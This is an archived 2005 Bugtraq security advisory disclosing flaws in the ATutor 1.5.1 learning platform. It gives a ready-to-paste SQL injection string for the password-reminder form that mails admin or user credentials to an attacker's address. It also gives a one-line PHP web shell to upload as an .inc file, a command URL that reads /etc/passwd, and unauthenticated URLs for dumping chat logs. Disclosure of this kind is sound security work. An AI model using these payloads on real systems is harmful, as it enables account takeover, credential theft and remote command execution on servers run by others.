ATutor 1.5.1 SQL Injection / Admin credentials disclosure / remote code execution

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: ATutor 1.5.1 SQL Injection / Admin credentials disclosure / remote code execution
From: retrogod@xxxxxxxxxxxxx
Date: 14 Sep 2005 09:52:22 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

ATUTOR 1.5.1 (possibly prior versions)
SQL INJECTION / ADMIN & USERS CREDENTIALS DISCLOSURE / INFORMATION DISCLOSURE /
USER IMPERSONATION / REMOTE CODE EXECUTION

software:

site: http://www.atutor.ca/

description: "ATutor is an Open Source Web-based Learning Content Management 
System (LCMS) designed with
accessibility and adaptability in mind. Administrators can install or update 
ATutor in minutes, and
develop custom templates to give ATutor a new look. Educators can quickly 
assemble, package, and redistribute
Web-based instructional content, easily retrieve and import prepackaged 
content, and conduct their courses online.
Students learn in an adaptive learning environment."


a) if magic_quotes_gpc is off in php.ini - > SQL INJECTION
   without to have an user account, you can use password remider to send 
yourself admin
   login & password, no need for exploit code:

   go to http://[target]/[path]/password_reminder.php

   and in the email field type:

   ' UNION SELECT login, password, 'your_email@xxxxxxxxxx' FROM AT_admins /*

   look at the vulnerable code in password_reminder.php:

   ...
   $sql="SELECT login, password, email FROM ".TABLE_PREFIX."members WHERE 
email='$_POST[form_email]'";
   $result = mysql_query($sql,$db);
if ($row = mysql_fetch_assoc($result)) {

$r_login = $row['login'];
$r_passwd= $row['password'];
$r_email = $row['email'];

$tmp_message  = _AT(array('password_request2',$_base_href))."\n\n";
$tmp_message .= _AT('web_site').' : '.$_base_href."\n";
$tmp_message .= _AT('login_name').' : '.$r_login."\n";
$tmp_message .= _AT('password').' : '.$r_passwd."\n";

require(AT_INCLUDE_PATH . 'classes/phpmailer/atutormailer.class.php');

$mail = new ATutorMailer;

$mail->From     = EMAIL;
$mail->AddAddress($r_email);
$mail->Subject = SITE_NAME . ': ' . _AT('password_reminder');
$mail->Body    = $tmp_message;

if(!$mail->Send()) {
   //echo 'There was an error sending the message';
   $msg->printErrors('SENDING_ERROR');
   exit;
}

$msg->addFeedback('PASSWORD_SUCCESS');
   ...

   $_POST[form_email] is not filtered in any way as you can see, so the query 
become:

   SELECT login, password, email FROM AT_members WHERE email='' UNION SELECT 
login, password, 'your_email@xxxxxxxxxx' FROM AT_admins /*'

   /* are the Mysql comment chars so this is a valid query

   $r_login and $r_passord are admin user & passord but $r_email is yours! ;)

   also, you can have the password of any user typing:

   ' UNION SELECT login, password, 'your_email@xxxxxxxxxx' FROM AT_members 
where login='user_whom_you_want_the_password' /*

   if you want to see if your course server is vulnerable just type ' in email 
field, you will have an error like this:

   Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result 
resource in
   [pathto]/password_reminder.php on line 27

   if not, you will see a message like this:

   The following errors occurred:
   * No account found with that email address.

b) after you have your stealed admin or educator account (yes, an educator can 
upload xecutable files :) )
   you can execute arbitrary commands on target system uploading an .inc file 
(this extension is not checked)
   with php code inside, example:

   <?php error_reporting(0); system($HTTP_GET_VARS[cmd]; ?>

   then you can launch commands, example:

   http://[target]/[path]/atutor/content/2/cmd.inc?cmd=cat%20/etc/passwd

   (usually upload dir is 'content' if admin do not change it, and subdir is 
numbered by the time registration
    of user, you can quickly bruteforce the url manually)

   look at the list of illegal extensions in config.inc.php:

   ...
   /* Illegal file types, by extension. Include any extensions             */
   /* you do not want to allow for uploading. (Just the extention          */
   /* without the leading dot.)                                            */
   $IllegalExtentions = 
array('exe','asp','php','php3','bat','cgi','pl','com','vbs','reg','pcd','pif','scr','bas','inf','vb','vbe','wsc','wsf','wsh');
   ...

   but where are .inc, .php4, .phtml, .html, .pwml and so on if you do not set?
   should be better to setup which kind of files you CAN upload...

c) without have an account a user can read chat conversation without to be 
logged in, making GET requests for
   chat temporary files:

   example:
   http://[target]/[path]/atutor/content/chat/2/msgs/1.message
   http://[target]/[path]/atutor/content/chat/2/msgs/2.message
   http://[target]/[path]/atutor/content/chat/2/msgs/3.message

   ciclyng this GET requests a user can dump all chat archive


rgod
site: http://rgod.altervista.org
mail: retrogod [at] aliceposta.it
original advisory: http://rgod.altervista.org/atutor151.html

Prev by Date: Secunia Research: AVIRA Antivirus ACE Archive Handling Buffer Overflow
Next by Date: [SECURITY] [DSA 814-1] New lm-sensors packages fix insecure temporary file
Previous by thread: Secunia Research: AVIRA Antivirus ACE Archive Handling Buffer Overflow
Next by thread: [SECURITY] [DSA 814-1] New lm-sensors packages fix insecure temporary file
Index(es):
- Date
- Thread